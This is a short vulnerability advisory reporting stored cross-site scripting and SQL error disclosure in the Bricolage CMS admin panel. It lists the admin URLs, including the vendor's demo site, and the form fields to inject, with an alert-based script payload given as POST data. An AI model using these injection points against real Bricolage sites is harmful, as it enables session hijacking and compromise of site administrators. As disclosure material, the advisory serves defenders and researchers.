_______  ________________ __    _____________
_______ \   _  \ \   _  \______  \  | _/_   \______  \         __  _  __
\_  __ \/  /_\  \/  /_\  \  /    /  |/ /|   |   /    /  ______ \ \/ \/ /
 |  | \/\  \_/   \  \_/   \/    /|    < |   |  /    /  /_____/  \     /
 |__|    \_____  /\_____  /____/ |__|_ \|___| /____/             \/\_/
               \/       \/            \/


-------------------------------------------------------------------------------------------------------------------------------------------------

    TITLE:  Bricolage CMS Admin panel Multiple stored XSS,SQL error pages
    vendor:  Bricolage CMS
    Author: r007k17-w a.k.a Raghavendra Karthik.D
    Email:  n4gb07@gmail.com
    My blog: http://shadowrootkit.wordpress.com/
    Download Link: http://bricolagecms.org/downloads/
    Versions: 1.*.*/2*
    Tested on: Windows7
-----------------------------------------------------------------------------------------------------------------------------------------------------------------

DEMO:
  A)Persistent XSS
     1.  http://localhost/admin/profile/output_channel/
       DEMO: http://demo.bricolagecms.org/admin/profile/output_channel/
         In 'Name' and 'Description' field,
         POST DATA= "'-->><script>alert(0)</script>

     2. http://localhost/admin/profile/source/
        DEMO: http://demo.bricolagecms.org/admin/profile/source/
         In 'Source Name' and 'description' field,
         POST DATA= "'-->><script>alert(0)</script>

  B)SQL error pages on reflected XSS/malicious char(Info Disclosure)
     1.  http://localhost/admin/profile/element_type/
         Demo: http://demo.bricolagecms.org/admin/profile/element_type/
         In 'Source Name' and 'description' field,
         POST DATA= "'-->><script>alert(0)</script>


----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    gr33t1ngs and ShOuTZ to s1d3-3ff3cts ,crusi,s1l3n7 4ss4s1n and my
friends